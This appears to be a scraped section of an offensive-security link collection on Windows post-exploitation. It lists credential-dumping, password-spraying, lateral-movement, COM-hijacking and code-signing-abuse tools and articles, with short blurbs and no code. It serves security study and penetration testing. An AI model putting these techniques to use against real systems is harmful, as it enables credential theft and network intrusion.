- .Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py. By default runs in the context of the current user.
-
Dumpert
-
Mimikatz/Similar
- Official
-
Using
- Unofficial Guide to Mimikatz
- Mimikatz Overview, Defenses and Detection
- Mimikatz Logs and Netcat
- Dumping a Domains worth of passwords using mimikatz
- Mass mimikatz - hacklikeapornstar
- Reading DPAPI Encrypted Secrets with Mimikatz and C++ -ired.team
- How to add a Module in Mimikatz?
-
howto ~ scheduled tasks credentials - Benjamin Delpy(2017)
- There are somes ways to get scheduled tasks passwords
- howto ~ credential manager saved credentials - Benjamin Delpy(2017)
- mimikatz offline addendum - francesco picasso
-
How-it-Works
- mimikatz: deep dive on lsadump::lsa /patch and /inject - Dimitrios Slamaris
-
Walk-through Mimikatz sekurlsa module -
- So in this post, I propose you to follow the steps I used in an attempt to understand the sekurlsa::tspkg command and reproduce its operations with WinDbg on a LSASS dump from a Windows 7 SP1 64-bits machine. We will find the secrets in the dump, and then decrypt them.
- Exploring Mimikatz - Part 1 - WDigest - Adam Chester
- Uncovering Mimikatz ‘msv’ and collecting credentials through PyKD - Matteo Malvica(2020)
- Defense
-
Other
- Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest
- Windows Credential Guard & Mimikatz - nviso
- Auto-Dumping Domain Credentials using SPNs, PowerShell Remoting, and Mimikatz - Scott Sutherland
-
Mimikatz 2.0 - Brute-Forcing Service Account Passwords
- If everything about that ticket-generation operation is valid except for the NTLM hash, then accessing the web application will result in a failure. However, this will not cause a failed logon to appear in the Windows® event log. It will also not increment the count of failed logon attempts for the service account. Therefore, the result is an ability to perform brute-force (or, more realistically, dictionary-based) password checks for such a service account, without locking it out or generating suspicious event log entries.
- Golden Tickets
- Skeleton Key
- DCSync
- Mimikatz and DCSync and ExtraSids, Oh My - harmj0y
- Active Directory Attack - DCSync - c0d3xpl0it
- Play with katz, get scratched - Skelsec(2020)
-
BetterSafetyKatz
- Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory.
-
pypykatz
-
pypykatz
- Mimikatz implementation in pure Python
- pypykatz_server
- pypykatz_dn
-
pypykatz
-
MsvpPasswordValidate Hooking
-
MsvpPasswordValidate hooking - Federico Lagasta
- Dumping local credentials by hooking MsvpPasswordValidate in NtlmShared.dll
-
HppDLL
- Source code for HppDLL - local password dumping using MsvpPasswordValidate hooks.
-
MyHashDump
- Project to inject into lsass and use a function hook on MsvpPasswordValidate to collect hashes.
-
MsvpPasswordValidate hooking - Federico Lagasta
-
NPLogonNotify()
-
NPLogonNotify function (npapi.h) - docs.ms
- MPR calls this function to notify the credential manager that a logon event has occurred, allowing the credential manager to return a logon script. The NPLogonNotify function is implemented by a credential manager DLL (see Remarks).
- Getting Windows Passwords in ClearText - Aaladha(2020)
-
NPPSpy
- Simple (but fully working) code for NPLogonNotify(). The function obtains logon data, including cleartext password.
-
NPLogonNotify function (npapi.h) - docs.ms
-
NTLM-related
- The NTLM Authentication Protocol and Security Support Provider - davenport.sourceforge
-
Live off the Land and Crack the NTLMSSP Protocol
- Last month Bleeping Computer published an article about PKTMON.EXE, a little known utility in Windows 10 that provides the ability to sniff and monitor network traffic. I quickly wondered if it would be feasible to use this utility, and other native tools within Windows, to capture NTLMv2 network authentication handshakes. TL;DR: Yes it is possible and I wrote a Python3 script called NTLMRawUnHide that can extract NTLMv2 password hashes from packet dumps of many formats!
-
NTLMRawUnhide.py
- NTLMRawUnhide.py is a Python3 script designed to parse network packet capture files and extract NTLMv2 hashes in a crackable format. The tool was developed to extract NTLMv2 hashes from files generated by native Windows binaries like NETSH.EXE and PKTMON.EXE without conversion.
-
Password Filter DLL
-
PasswordStealing -PSBits
- "Password stealing DLL I wrote around 1999, some time before Active Directory was announced. And of course it still works. First, it was written in 32-bit Delphi (pardon my language) and when it stopped working as everything changed into 64-bit - in (so much simpler when it comes to Win32 API) C, as I did not have 64-bit Delphi. The original implementation was a bit more complex, including broadcasting the changed password over the network etc. but now it works as a demonstration of an idea, so let's keep it as simple as possible. It works everywhere - on local machines for local accounts and on DCs for domain accounts."
- Credential Access – Password Filter DLL - NetbiosX
-
PasswordStealing -PSBits
-
Password Spraying
-
Linux
- Raining shells on Linux environments with Hwacha
-
Hwacha
- Hwacha is a tool to quickly execute payloads on
*
Nix based systems. Easily collect artifacts or execute shellcode on an entire subnet of systems for which credentials are obtained.
- Hwacha is a tool to quickly execute payloads on
-
Windows
- Use PowerShell to Get Account Lockout and Password Policy
-
DomainPasswordSpray
- DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain.
-
DomainPasswordSpray
- DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. It will automatically generate a userlist from the domain which excludes accounts that are expired, disabled locked out, or within 1 lockout attempt.
-
NTLM - Open-source script from root9B for manipulating NTLM authentication
- This script tests a single hash or file of hashes against an ntlmv2 challenge/response e.g. from auxiliary/server/capture/smb The idea is that you can identify re-used passwords between accounts that you do have the hash for and accounts that you do not have the hash for, offline and without cracking the password hashes. This saves you from trying your hashes against other accounts live, which triggers lockouts and alerts.
-
CredNinja
- A multithreaded tool designed to identify if credentials are valid, invalid, or local admin valid credentials within a network at-scale via SMB, plus now with a user hunter.
-
passpr3y
- This is a fire-and-forget long-running password spraying tool. You hand it a list of usernames and passwords and walk away. It will perform a horizontal login attack while keeping in mind lockout times, erroneous responses, etc... Set it up on your attack box at the beginning of an assessment and check back for creds gradually over time. Output is intended to be easy to read through and grep. Focus is on simplicity.
-
Spray
- A Password Spraying tool for Active Directory Credentials by Jacob Wilkin(Greenwolf)
-
Sharphose
- SharpHose is a C# password spraying tool designed to be fast, safe, and usable over Cobalt Strike's execute-assembly. It provides a flexible way to interact with Active Directory using domain-joined and non-joined contexts, while also being able to target specific domains and domain controllers. SharpHose takes into consideration the domain password policy, including fine grained password policies, in an attempt to avoid account lockouts. Fine grained password policies are enumerated for the users and groups that that the policy applies to. If the policy applied also to groups, the group users are captured. All enabled domain users are then classified according to their password policies, in order of precedence, and marked as safe or unsafe. The remaining users are filtered against an optional user-supplied exclude list. Besides just spraying, red team operators can view all of the password policies for a domain, all the users affected by the policy, or just view the enabled domain users. Output can be sent directly to the console or to a user-supplied output folder.
-
Linux
- RDP
-
Service Accounts
-
Tools
-
serviceFu
- Automates credential skimming from service accounts in Windows Registry
-
serviceFu
-
Tools
- Volume Shadow Copy Service
- WDigest
-
Web Browsers
-
SharpCookieMonster
- Extracts cookies from Chrome.
- Blogpost
-
SharpCookieMonster
- Wifi(saved)
-
Tools
-
credgrap_ie_edge
- Extract stored credentials from Internet Explorer and Edge
-
quarkspwdump
- Dump various types of Windows credentials without injecting in any process.
-
SessionGopher
- SessionGopher is a PowerShell tool that uses ff to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.
-
CredCrack
- CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recusively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded! CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory.
-
pysecdump
- pysecdump is a python tool to extract various credentials and secrets from running Windows systems. It currently extracts:
- LM and NT hashes (SYSKEY protected); Cached domain passwords; LSA secrets; Secrets from Credential Manager (only some)
-
Remote-Desktop-Caching-
- This tool allows one to recover old RDP (mstsc) session information in the form of broken PNG files. These PNG files allows Red Team member to extract juicy information such as LAPS passwords or any sensitive information on the screen. Blue Team member can reconstruct PNG files to see what an attacker did on a compromised host. It is extremely useful for a forensics team to extract timestamps after an attack on a host to collect evidences and perform further analysis.
-
credgrap_ie_edge
-
101
-
Discovery
- 101
-
Talks/Presentations/Videos
-
Post Exploitation: Striking Gold with Covert Recon - Derek Rook(WWHF19)
- You're on a covert penetration test focusing on the client's monitoring and alerting capabilities. You've just established a foothold, maybe even elevated to admin, but now what? You want to know more about the internal network but careless packet slinging will get you caught. Join me on a mining expedition where you can't swing your pick axe without striking gold. We'll be mining logs, pilfering connection statistics, and claim jumping process network connections. Without leaving the comfort of your beachhead, you'll be shouting "Eureka!" in no time.
-
Post Exploitation: Striking Gold with Covert Recon - Derek Rook(WWHF19)
- AD
-
AppLocker
- Articles/Blogposts/Writeups
- Tools
-
Browser Cookies
-
cookie_crimes
- Read local Chrome cookies without root or decrypting
-
cookie_crimes
- COM
-
Endpoint Protections
- Articles/Blogposts/Writeups
- Event Log
-
Files
-
Articles/Blogposts/Writeups
-
Build a Query to Search the Windows Index from PowerShell - Dr Scripto(2012)
- Guest blogger, James O’Neill, discusses using Windows PowerShell to build a query to search the Windows Index.
- Hey, Scripting Guy! Weekend Scripter: Using the Windows Search Index to Find Specific Files - Dr Scripto(2010)
- Reading Windows Sticky Notes - two06(2020)
- Red Team Enumeration: A corner rarely explored - Mohammed Danish(2020)
-
StickyReader
- Read Sticky Notes from Windows 10
- Unmanaged file searching with Filesearcher.exe - Jean-François Maes(2020)
-
Build a Query to Search the Windows Index from PowerShell - Dr Scripto(2012)
-
Tools
-
Snaffler
- Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly, but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment).
-
diskover
- File system crawler, disk space usage, file search engine and file system analytics powered by Elasticsearch
-
FileSearcher
- Unmanaged assembly file searcher for when a fully interactive beacon session is not opsec safe enough.
-
Snaffler
-
Articles/Blogposts/Writeups
-
Logs
- Articles/Blogposts/Writeups
-
Mail
- Articles/Blogposts/Writeups
- Tools
-
NetworkCapture
- Articles/Blogposts/Writeups
- Tools
-
Sitrep
-
Articles/Blogposts/Writeups
- Windows Driver and Service enumeration with Python - slacker007(2015)
-
Finding Hidden Treasure on Owned Boxes: Post-Exploitation Enumeration with wmiServSessEnum - RedXORBlue(2019)
- TLDR: We can use WMI queries to enumerate accounts configured to run any service on a box (even non-started / disabled), as well as perform live session enumeration. Info on running the tool is in the bottom section.
- Detecting Hypervisor Presence On Windows 10 - Daax Rynd
- Windows information gathering using Powershell: a brief cheatsheet - Andrea Fortuna(2019)
- Get Process List with Command Line Arguments - mubix(2020)
- What was my IP? Ask DoSvc on Windows 10 - Forense nella Nebbia(2018)
- Tools
-
Articles/Blogposts/Writeups
-
User Awareness
- [Enumerating Users without net, Services without sc and Scheduled Tasks without schtasks - @spotheplanet]
- T1010: Application Window Discovery - @spotheplanet
- T1087: Account Discovery & Enumeration - @spotheplanet
-
General Tools
-
PyStat
- Advanced Netstat For Windows
-
pspy
- pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea. The tool gathers it's info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
-
forgetmenot
- local looting script in python
-
SharpPrinter
- SharpPrinter is a modified and console version of ListNetworks. As an example, one could execute SharpPrinter.exe through Cobalt Strike's Beacon "execute-assembly" module.
-
wmiServSessEnum
- multithreaded .net tool that uses WMI queries to enumerate active user sessions and accounts configured to run services (even those that are stopped and disabled) on remote systems
-
MemScan
- Quick Proof of Concept for reading a processes memory and searching for a specific string.
-
RidRelay
- Enumerate usernames on a domain where you have no creds by using SMB Relay with low priv.
-
Eavesarp
- A reconnaissance tool that analyzes ARP requests to identify hosts that are likely communicating with one another, which is useful in those dreaded situations where LLMNR/NBNS aren't in use for name resolution.
- Blogpost
-
hunter
- (l)user hunter using WinAPI calls only
-
NetRipper
- NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.
-
NCC Group Scrying
- A tool for collecting RDP, web and VNC screenshots all in one place
-
PyStat
-
Lateral Movement
-
Articles/Blogposts/Writeups
- Using Credentials to Own Windows Boxes - Part 1 (from Kali) - ropnop
- Authenticated Remote Code Execution Methods in Windows
- Lateral Movement and Persistence: tactics vs techniques - hexacorn(2018)
- Offensive Lateral Movement - Hausec
- Lateral Movement - Riccardo Carrani(2019)
- Description of User Account Control and remote restrictions in Windows Vista - support.ms
- LAteral Movement Encryption technique (a.k.a. The "LAME" technique) - dotelite.gr(2018)
-
Talks/Presentations/Videos
- The Industrial Revolution of Lateral Movement - Tal Be'ery, Tal Maor(BH USA17)
-
Look what you could be up against soon - FX, Hadez(Offensivecon2020)
- Lateral movement is essential for offensive operations during CNO. Exploiting the inherent trust relationships is what makes spreading within the chewy inside of a network so easy once the crunchy outside is broken. But what if the chewy inside is bitchy and challenges you everywhere you want to go? That's what P3KI is all about: To make the chewy inside more bitchy. Hear about how we intend to make your life harder and why the often dismissed "social engineering" aspect might become essential in cases where you face a network employing P3KI's technology deployed.
- AppInit.dlls
-
DCOM
- Lateral movement using excel application and dcom(2017)
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript - Matt Nelson(2017)
- New lateral movement techniques abuse DCOM technology - Philip Tsukerman(2018)
- Lateral Movement with PowerPoint and DCOM - Attactics(2018)
- T1175: Lateral Movement via DCOM - @spotheplanet
- I Like to Move It: Windows Lateral Movement Part 2 – DCOM - Dominic Chell(2020)
- Desired State Configuration
- DLL Hijacking
-
Excel
- Excel4.0 Macros - Now With Twice The Bits! - Philip Tsukerman
-
Excel4-DCOM
- PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe)
-
Invoke-ExShellcode.ps1 - Philts
- Lateral movement and shellcode injection via Excel 4.0 macros
- NTLM Relay
-
Pass-The-Hash
- 101
-
Articles/Blogposts/Writeups
- Puff Puff PSExec - Jonathan Renard
-
PsExec and the Nasty Things It Can Do
- An overview of what PsExec is and what its capabilities are from an administrative standpoint.
- Pass-the-Hash is Dead: Long Live Pass-the-Hash - harmj0y
- Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - harmj0y
- Still Passing the Hash 15 Years Later: Using Keys to the Kingdom to Access Data - BH 2012
- Still Passing the Hash 15 Years Later
- The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1
-
Pass-the-Hash in Windows 10 - Lukasz Cyra(2019)
- Attackers have used the Pass-the-Hash (PtH) attack for over two decades. Its effectiveness has led to several changes to the design of Windows. Those changes influenced the feasibility of the attack and the effectiveness of the tools used to execute it. At the same time, novel PtH attack strategies appeared. All this has led to confusion about what is still feasible and what configurations of Windows are vulnerable. This paper examines various methods of hash extraction and execution of the PtH attack. It identifies the prerequisites for the attack and suggests hardening options. Testing in Windows 10 v1903 supports the findings. Ultimately, this paper shows the level of risk posed by PtH to environments using the latest version of Windows 10.
-
Et tu Kerberos - Christopher Campbell
- For over a decade we have been told that Kerberos is the answer to Microsoft’s authentication woes and now we know that isn’t the case. The problems with LM and NTLM are widely known- but the problems with Kerberos have only recently surfaced. In this talk we will look back at previous failures in order to look forward. We will take a look at what recent problems in Kerberos mean to your enterprise and ways you could possibly mitigate them. Attacks such as Spoofed-PAC- Pass-the-Hash- Golden Ticket- Pass-the-Ticket and Over-Pass-the-Ticket will be explained. Unfortunately- we don’t really know what is next – only that what we have now is broken.
- Battle Of SKM And IUM How Windows 10 Rewrites OS Architecture - Alex Ionescu - BHUSA2015
- Psexec: The Ultimate Guide - Adam Bertram
-
Pass the Hash with Kerberos - mubix
- This blog post may be of limited use, most of the time, when you have an NTLM hash, you also have the tools to use it. But, if you find yourself in a situation where you don’t have the tools and do happen to have kerberos tools, you can pass the hash with it.
- Pass-The-Hash with RDP in 2019 - Acebond
-
Tools
-
smbexec
- A rapid psexec style attack with samba tools
- Blogpost that inspired it
-
pth-toolkit I.e Portable pass the hash toolkit
- A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems
-
smbexec
-
PS-Remoting
- 101
- Articles/Blogposts/Writeups
-
Protocol Handler
- Articles/Blogposts/Writeups
-
Tools
-
PoisonHandler
- This technique is registering a protocol handler remotely and invoke it to execute arbitrary code on the remote host. The idea is to simply invoke start handler:// to execute commands and evade detection.
-
PoisonHandler
-
Port-Forwarding & Proxies
- Port Forwarding in Windows - WindowsOSHub
-
WinPortPush
- win PortPush is a small PowerShell utility used for pivoting into internal networks upon compromising a Windows public-facing host.
-
RDP
- Remote Desktop Services Shadowing – Beyond the Shadowed Session - Roman Maximov(2020)
- [RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation - Kevin Beaumont])(https://doublepulsar.com/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6)
- RDPInception - MDsec
-
The RDP Through SSH Encyclopedia - Carrie Roberts
- I have needed to remind myself how to set up RDP access through an SSH connection so many times that I’ve decided to document it here for future reference. I hope it proves useful to you as well. I do “adversary simulation” for work and so I present this information using terms like “attacker” and “target” but this info is also useful for performing system administration tasks.
- Remote Desktop tunneling tips & tricks - Maurizio Agazzini
- Jumping Network Segregation with RDP - Rastamouse
-
Revisiting Remote Desktop Lateral Movement - 0xthirteen(2020)
- Remote Desktop Protocol .NET Console Application for Authenticated Command Execution
-
Registry-related
- Articles/Blogposts/Writeups
-
Tools
-
WMIReg
- This PoC was started from a code snippet of @harmj0y's that I thought was pretty cool. Using the StdRegProv management class through WMI, you are able to read and write to local and remote registry keys. This doesn't seem very special, but the biggest advantage is that remote registry interaction is done through WMI, therefore it does not require the Remote Registry service to be enabled/started on the remote host!
-
WMIReg
-
SCM
- Articles/Blogposts/Writeups
- Tools
-
Services
- Articles/Blogposts/Writeups
-
Tools
-
MoveScheduler
- "MoveScheduler is another weekend binge that focuses on lateral movement via several different methods of scheduling tasks"
- SharpMove
-
SCShell
- SCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.
-
MoveScheduler
-
SMB
- Articles/Blogposts/Writeups
-
Tools
-
CrackMapExec
- A swiss army knife for pentesting networks
-
CrackMapExec
- SSH
-
WinRM
- 101
-
Articles/Blogposts/Writeups
- Windows Remote Management - dmcxblue
- WS-Management COM: Another Approach for WinRM Lateral Movement - bohops(2020)
- WinRM Penetration Testing - Yashika Dhir(2020)
- Lateral Movement Using WinRM and WMI - Tony Lambert(2017)
- Lateral Movement – WinRM - pentestlab.blog(2018)
- T1028: WinRM for Lateral Movement - @spottheplanet
-
Tools
-
Evil-WinRM
- The ultimate WinRM shell for hacking/pentesting
- WS-Management COM: Another Approach for WinRM Lateral Movement - BOHOPS(2020)
-
WSMan-WinRM
- A collection of proof-of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM object
-
rudder
- rudder is a Python package to run commands remotely on Windows, macOS or nix systems using PowerShell Remoting/WinRM or SSH.
-
Evil-WinRM
-
WMI
- 101
-
Articles/Blogposts/Writeups
- T1047: WMI for Lateral Movement - @spottheplanet
- Lateral Movement: WMI - Pavandeep Singh(2020)
- No Win32_Process Needed – Expanding the WMI Lateral Movement Arsenal - Philip Tsukerman
- Lateral Movement in an Environment with Attack Surface Reduction - Michael Bielenberg(2019)
- I Like to Move It: Windows Lateral Movement Part 1 – WMI Event Subscription - Dominic Chell(2020)
- Papers
-
Tools
-
WMI Shell Tool
- The WMI shell tool that we have developed allows us to execute commands and get their output using only the WMI infrastructure, without any help from other services, like the SMB server. With the wmi-shell tool we can execute commands, upload files and recover Windows passwords remotely using only the WMI service available on port 135.
-
WMIcmd
- A command shell wrapper using only WMI for Microsoft Windows
-
WMI Shell Tool
- WSH
-
(Ab)Using 'Legitimate' Applications already installed
-
How I Hacked Into Your Corporate Network Using Your Own Antivirus Agent - Angelo Ruwantha
- Code exec through admin access to eset admin console
-
Abusing Common Cluster Configuration for Lateral Movement
- Tech sites have published articles that walk a Windows Systems Administrator through the process of adding a machine account to the Local Administrators group on another machine. These accounts end in a $ (dollar sign) and look like SERVER$ in Active Directory. While this may be useful for simplifying the installation of clusters such as Lync, Exchange, or SQL Server, it’s not always the best idea. Servers that are set up in this way weaken the overall security posture of the cluster, and ultimately the organization, by allowing a single vulnerability or misconfiguration on one server the ability to move laterally without having to escalate privileges or compromise additional credentials. Using SQL Server as the example, any user who has READ permissions to a database essentially has SYSTEM-level permissions on a remote server. We’ll walk through that path below.
- Abusing Firefox in Enterprise Environments - MDSec
-
How I Hacked Into Your Corporate Network Using Your Own Antivirus Agent - Angelo Ruwantha
-
Tools
-
PoisonHandler
- This technique is registering a protocol handler remotely and invoke it to execute arbitrary code on the remote host. The idea is to simply invoke start handler:// to execute commands and evade detection.
-
PoisonHandler
-
Articles/Blogposts/Writeups
-
Collection
- 101
-
Articles/Blogposts/Writeups
- Digging Up the Past: Windows Registry Forensics Revisited - David Via
- Pillage Exchange - Digby
- Pillaging .pst Files - Digby
- File Server Triage on Red Team Engagements - harmj0y
- No one expect command execution!
- Decrypting IIS Passwords to Break Out of the DMZ
- Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host - zc00l(2018)
-
CC
-
SearchForCC
- A collection of open source/common tools/scripts to perform a system memory dump and/or process memory dump on Windows-based PoS systems and search for unencrypted credit card track data.
-
SearchForCC
-
Code Storage
-
dvcs-ripper
- Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ... It can rip repositories even when directory browsing is turned off.
-
cred_scanner
- A simple command line tool for finding AWS credentials in files. Optimized for use with Jenkins and other CI systems.
-
dvcs-ripper
- KeePass
- Outlook
-
PCAP/Live Interface
-
net-creds
- Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.
-
PCredz
- This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
-
net-creds
-
Skype
-
skype log viewer
- Download and View Skype History Without Skype This program allows you to view all of your skype chat logs and then easily export them as text files. It correctly organizes them by conversation, and makes sure that group conversations do not get jumbled with one on one chats.
-
skype log viewer
-
Exfiltration
- Articles/Blogposts/Writeups
Windows Technologies
-
Alternate Data Streams
- 101 *
-
AppLocker
-
101
-
AppLocker - docs.ms
- This topic provides a description of AppLocker and can help you decide if your organization can benefit from deploying AppLocker application control policies. AppLocker helps you control which apps and files users can run. These include executable files, scripts, Windows Installer files, dynamic-link libraries (DLLs), packaged apps, and packaged app installers.
- What Is AppLocker? - docs.ms
- AppLocker design guide - docs.ms
- AppLocker deployment guide - docs.ms
- AppLocker technical reference - docs.ms
- How AppLocker works - docs.ms
- Security considerations for AppLocker - docs.ms
-
AppLocker - docs.ms
-
Articles/Blogposts/Writeups
- Getting Started With AppLocker - John Strand(2019)
- Script Rules in AppLocker - technet
- DLL Rules in AppLocker
- Application Whitelisting Using Microsoft AppLocker
- Harden Windows with AppLocker – based on Case study Part 1 - oddvar.moe
- Harden Windows with AppLocker – based on Case study part 2 - oddvar.moe
- AppLocker Case study: How insecure is it really? Part 1 oddvar.moe
- AppLocker Case study: How insecure is it really? Part 2](https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/)
- Talks/Presentations/Videos
-
101
- Application Shims
-
ClickOnce Applications
- ClickOnce - Wikipedia
- ClickOnce security and deployment - docs.ms
- ClickOnce Deployment for Windows Forms - docs.ms
-
ClickOnce Applications in Enterprise Environments - Remko Weijnen
- ClickOnce is a Microsoft technology that enables an end user to install an application from the web without administrative permissions.
- Eight Evil Things Microsoft Never Showed You in the ClickOnce Demos (and What You Can Do About Some of Them) - Chris Williams
-
Credential Guard
- 101 *
-
Code Signing
-
Articles/Blogposts/Writeups
- Windows File Confusion: Masquerading Unsigned Binaries as Signed Ones - Matt Graeber(2013)
- Inside Code Signing - Thomas 'toto' Kollbach(2014)
- Code Signing Certificate Cloning Attacks and Defenses - Matt Graeber
- MetaTwin – Borrowing Microsoft Metadata and Digital Signatures to “Hide” Binaries - Joe Vest
- Borrowing Microsoft Code Signing Certificates - lopi
- Application of Authenticode Signatures to Unsigned Code - mattifestation
- Subverting Trust in Windows - Matt Graeber
- Masquerading as a Windows System Binary Using Digital Signatures - Stuart Morgan
- Hijack Digital Signatures – PowerShell Script - pentestlab.blog
- Code Signing Certificates - Barry Vengerik(FireEye Summit(2019)
-
Code Signing on a Budget - @Jackson_T(2020)
- "Summary: This post goes over how attackers could use search engines to find and abuse legitimate code-signing certificates. With this technique, I was able to find a valid code-signing certificate belonging to a leading tech company and disclosed it to them. This isn't particularly novel but I'm writing this to raise defensive awareness that abusing code-signing certificates is not limited to well-resourced attackers."
-
CarbonCopy
- A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux
- Signing .jar files with an existing certificate on Windows - Chad Duffey(2020)
- Talks/Videos
-
Tools
-
certerator
- This is the code relating to a project to simplify the act of creating a CA, signing a binary with the CA and then installing the CA on the target machine. It investigates the extent to which this can be achieved without the benefit of a GUI and shows how this can be modified to generate valid EV certificates which are trusted by Windows. It is intended for penetration testers who are looking to install an implant binary which looks as legitimate as possible. None of these techniques are new, but it is hoped that this tool and project will make them easier and more accessible.
-
certerator
-
Articles/Blogposts/Writeups
-
(Distributed) Component-Object-Model(COM)
-
101
- Component Object Model - Wikipedia
- Distributed Component Object Model - Wikipedia
-
The Component Object Model - docs.ms
- COM is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents) and ActiveX (Internet-enabled components) technologies.
-
[MS-DCOM]: Distributed Component Object Model (DCOM) Remote Protocol - docs.ms
- Specifies the Distributed Component Object Model (DCOM) Remote Protocol, which exposes application objects via remote procedure calls (RPCs) and consists of a set of extensions layered on the Microsoft Remote Procedure Call Extensions.
- [MS-RPCE]: Remote Procedure Call Protocol Extensions - msdn.ms
-
Guide(to COM) - docs.ms
- This guide introduces the Microsoft Component Object Model (COM).
- COM Fundamentals - docs.ms
-
COM Objects and Interfaces - docs.ms
- COM is a technology that allows objects to interact across process and computer boundaries as easily as within a single process. COM enables this by specifying that the only way to manipulate the data associated with an object is through an interface on the object. When this term is used in this documentation, it refers to an implementation in code of a COM binary-compliant interface that is associated with an object.
- COM Reference - docs.ms
- COM Glossary
-
Articles/Blogposts/Writeups
- Component Object Model Technical Overview - The ActiveX Core Technology Reference(1999)
- Mike Panitz's Introduction to COM
-
The Component Object Model: Technical Overview(1994)
- This paper is adapted from an article appearing in Dr. Dobbs Journal, December 1994.
-
Exploiting .NET Managed DCOM - James Forshaw(2017)
- One of the more interesting classes of security vulnerabilities are those affecting interoperability technology. This is because these vulnerabilities typically affect any application using the technology, regardless of what the application actually does. Also in many cases they’re difficult for a developer to mitigate outside of not using that technology, something which isn’t always possible. I discovered one such vulnerability class in the Component Object Model (COM) interoperability layers of .NET which make the use of .NET for Distributed COM (DCOM) across privilege boundaries inherently insecure. This blog post will describe a couple of ways this could be abused, first to gain elevated privileges and then as a remote code execution vulnerability.
- COM Hijacking – Windows Overlooked Security Vulnerability - Yaniv Assor
- Abusing COM objects - 0xpat
- Hunting COM Objects - Charles Hamilton(2019)
- COM and the PowerThIEf - Rob Malsen
- The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication - Airbus(2020)
- Talks/Presentations/videos
-
Papers
- The Dangers of Per-User COM Objects - Jon Larimer(2011)
-
Automating the enumeration of possibleDCOM vulnerabilities - Axel Boesenach(2018)
- This paper describes the research into DCOM applications that might be used forlateral movement on Microsoft Windows domains. ’Living off the land’ techniquesare used more and more by attackers, but also pentesters and red teams. The re-search builds on the previous methods and their correlations to develop an auto-mated manner to enumerate these DCOM applications that might provide lateralmovement.
-
COM Hijacking
- Articles/Blogposts/Writeups
-
Tools
- Helpful
-
COMMethodSearcher
- Script that searches through all COM objects for any methods containing a key word of your choosing.
-
COMMethodSearcher
- Discovery
-
OxidBindings
- Extract all IP of a computer using DCOM without authentication (aka detect network used for administration)
-
OxidBindings
- Hijacking
-
MessageBox
- PoC dlls for Task Scheduler COM Hijacking
-
PS1jacker
- Ps1jacker is a tool for generating COM Hijacking payload.
-
COMProxy
- A COM client and server for testing COM hijack proxying. If you are running a COM hijack, proxying the legitimate COM server may result in better stability, thats the idea around this PoC.
-
MessageBox
- Lateral Movement
-
DVS
- D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife - Lateral movement using DCOM Objects
-
DVS
- Helpful
-
Execution
-
Building a COM Server for Initial Execution - leoloobeek(2020)
- This post will expand on previous research and cover writing your own COM server DLL, loading it from scripting languages with registration-free activation, and discussion around weaponization and OPSEC. This was a personal journey that helped me learn a lot more about what happens when you create and use a COM object from JScript. I will also be releasing a PoC COM server that runs provided shellcode.
-
Tools
-
COMRunner
- A simple COM server which provides a component to run shellcode. Also includes a Windows JScript file to load the COM server and create the object with registration-free activation. This PoC COM server provides an object with a method that takes in base64 encoded shellcode and a method to run the shellcode.
-
COMRunner
-
Building a COM Server for Initial Execution - leoloobeek(2020)
- Serialization/Marshalling
-
Programming with
- C#
- C/C++
- Python
- VBA
-
101
-
DLLs
-
101
- What is a DLL? - support.ms
- Dynamic-Link-Library - Wikipedia
- DLL Hell - Wikipedia
-
Dynamic-Link Library Redirection - doc.ms
